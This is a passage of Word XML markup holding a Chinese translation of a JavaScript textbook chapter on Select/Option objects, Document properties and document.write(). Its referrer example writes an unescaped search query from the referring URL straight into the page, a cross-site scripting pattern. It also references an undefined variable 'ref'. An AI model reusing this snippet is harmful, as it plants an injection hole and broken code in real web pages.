        <w:t>指定了哪个选项当前被选中。针对</w:t>
      </w:r>
      <w:r>
        <w:t>"select-multiple"</w:t>
      </w:r>
      <w:r>
        <w:t>元素，单个</w:t>
      </w:r>
      <w:r>
        <w:t>selectedIndex</w:t>
      </w:r>
      <w:r>
        <w:t>属性不足以表示被选中的一组选项。在这种情况下，要判定哪些选项被选中，就必须遍历</w:t>
      </w:r>
      <w:r>
        <w:t>opt</w:t>
      </w:r>
      <w:r>
        <w:t>ions[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组的元素，并检测每个</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>selected</w:t>
      </w:r>
      <w:r>
        <w:t>属性值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了其</w:t>
      </w:r>
      <w:r>
        <w:t>selected</w:t>
      </w:r>
      <w:r>
        <w:t>属性，每个</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>对象有一个</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它指定了在</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素中的选项所显示的纯文本字符串。设置该属性可以改变显示给用户的文本。</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了在提交表单时发送到</w:t>
      </w:r>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>eb</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的文本字符串，它也是可读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写的。甚至在写纯客户端程序并且不可能有表单提交时，</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性（或它所对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>）是用来保存任何数据的好地方，在用户选取特定的选项时可以使用这些数据。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素并没有</w:t>
      </w:r>
      <w:r>
        <w:t>与表单相关的事件处理程序：用包含</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序来代替。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了设置</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>属性以外，使用</w:t>
      </w:r>
      <w:r>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:t>属性的特殊功能可以动态改变显示在</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素中的选项，这些功能可以追溯到最早期的客户端编程。通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>options.length</w:t>
      </w:r>
      <w:r>
        <w:t>为一个希望的值可以截断</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素数组，而设置</w:t>
      </w:r>
      <w:r>
        <w:t>options.length</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>可以从</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素中移除所有的选项。设置</w:t>
      </w:r>
      <w:r>
        <w:t>options[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组中某点的值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>可以从</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素中移除单个</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这将删除该</w:t>
      </w:r>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>ption</w:t>
      </w:r>
      <w:r>
        <w:t>对象，</w:t>
      </w:r>
      <w:r>
        <w:t>options[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组中高端的元素自动移下来填补空缺。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素增加一个新的选项，首先用</w:t>
      </w:r>
      <w:r>
        <w:t>Option()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>对象，然后将其添加到</w:t>
      </w:r>
      <w:r>
        <w:t>options[]</w:t>
      </w:r>
      <w:r>
        <w:t>属性中，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个新的选项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var zaire=new Option("Zaire",//text</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"zaire",//value</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>false,//defaultSelected</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>false);//selected</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>通过添加到</w:t>
      </w:r>
      <w:r>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:t>数组中，在</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素中显示该选项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var countries=document.address.country;//</w:t>
      </w:r>
      <w:r>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>countries.options[countries.options.length]=zaire;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>请牢记一点，这些专用的</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>已经很老了。可以用那些标准的调用更明确地插入和移除选项元素：</w:t>
      </w:r>
      <w:r>
        <w:t>Document.createElement()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Node.insertBefore()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Node.removeChild()</w:t>
      </w:r>
      <w:r>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="393" w:name="15_10_Qi_Ta_Wen_Dang_Te_Xing_"/>
      <w:r>
        <w:t>15.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　其他文档特性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="393"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章在一开始就声明了它是本书中最重要的一</w:t>
      </w:r>
      <w:r>
        <w:t>章。由其必要性，它也是最长的一章之一。本章最后一节涵盖了</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的若干混杂的特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="394" w:name="15_10_1_DocumentDe_Shu_Xing_"/>
      <w:r>
        <w:t>15.10.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="394"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章已经介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>的属性有</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>documentElement</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>forms</w:t>
      </w:r>
      <w:r>
        <w:t>等这些特殊的文档元素。文档还定义了一些其他有趣的属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>允许</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序读、写</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的特殊的属性。第</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>章涵盖该属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>该属性允许当</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面之间交互时，相同域名下互相信任的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器之间协作放宽同源策略安全限制（见</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>lastModified</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>包含文档修改时间的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>location</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用同一个</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>referrer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果有，它表示浏览器导航到当前链接的上一个文档。该属性值和</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:r>
        <w:t>头信息的内容相同，只是拼写上有两个</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>title</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档的＜</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>/title</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签之间的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，只读字符串而不是</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象。该属性值与</w:t>
      </w:r>
      <w:r>
        <w:t>location.href</w:t>
      </w:r>
      <w:r>
        <w:t>的初始值相同，只是不包含</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象的动态变化。例如，如果用户在文档中导向到一个新的片段，</w:t>
      </w:r>
      <w:r>
        <w:t>location.href</w:t>
      </w:r>
      <w:r>
        <w:t>会发生变化，但是</w:t>
      </w:r>
      <w:r>
        <w:t>document.URL</w:t>
      </w:r>
      <w:r>
        <w:t>则不会。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>referrer</w:t>
      </w:r>
      <w:r>
        <w:t>是这些属性中最有趣的属性之一：它包含用户链接到当前文档的上一个文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。可以用如下代码来使用该属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(document.referrer.indexOf("http://www.google.com/search?")==</w:t>
      </w:r>
      <w:r>
        <w:t>0){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var args=document.referrer.substring(ref.indexOf("?")+1).split("</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>args.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(args[i].substring(0,2)=="q="){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Welcome Google User.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write("You searched for:"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>unescape(args[i].substring(2)).replace</w:t>
      </w:r>
      <w:r>
        <w:t>('+','');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>break;</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上述代码中使用的</w:t>
      </w:r>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将是下一节的主题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="395" w:name="15_10_2_document_write__Fang_Fa_"/>
      <w:r>
        <w:t>15.10.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="395"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是其中一个由</w:t>
      </w:r>
      <w:r>
        <w:t>Netscape 2</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器实现的非常早期的脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。它曾在</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>之前就被很好地引入了，也曾是在文档中显示计算后的文本的唯一方法。新代码中已经不再需要它了，但在已有的代码中你还能不时地看到该方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>会将其字符串参数连接起来，然后将结果字符串插入到文档中调用它的脚本元素的位置。当脚本执行结束，浏</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>览器解析生成的输出并显示它。例如，以下代码使用</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>动态把信息输出到一个静态的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Document title:"+document.title);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>URL:"+document.URL);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Referred </w:t>
      </w:r>
      <w:r>
        <w:t>by:"+document.referrer);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Modified on:"+document.lastModified);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Accessed on:"+new Date());</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只有在解析文档时才能使用</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法输出</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>到当前文档中，理解这点非常重要。也就是说能够在＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中的顶层代码中调用</w:t>
      </w:r>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>，就是因为这些脚本的执行是文档解析流程的一部分。如果将</w:t>
      </w:r>
      <w:r>
        <w:t>doc</w:t>
      </w:r>
      <w:r>
        <w:t>ument.write()</w:t>
      </w:r>
      <w:r>
        <w:t>放在一个函数的定义中，而该函数的调用是从一个事件处理程序中发起的，产生的结果未必是你想要的</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>事实上，它会擦除当前文档和它包含的脚本！（马上你将看到为什么。）同理，在设置了</w:t>
      </w:r>
      <w:r>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>属性的脚本中不要使用</w:t>
      </w:r>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t>章中的例</w:t>
      </w:r>
      <w:r>
        <w:t>13-3</w:t>
      </w:r>
      <w:r>
        <w:t>以这种方式使用了</w:t>
      </w:r>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>来产生更加复杂的输出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>还可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
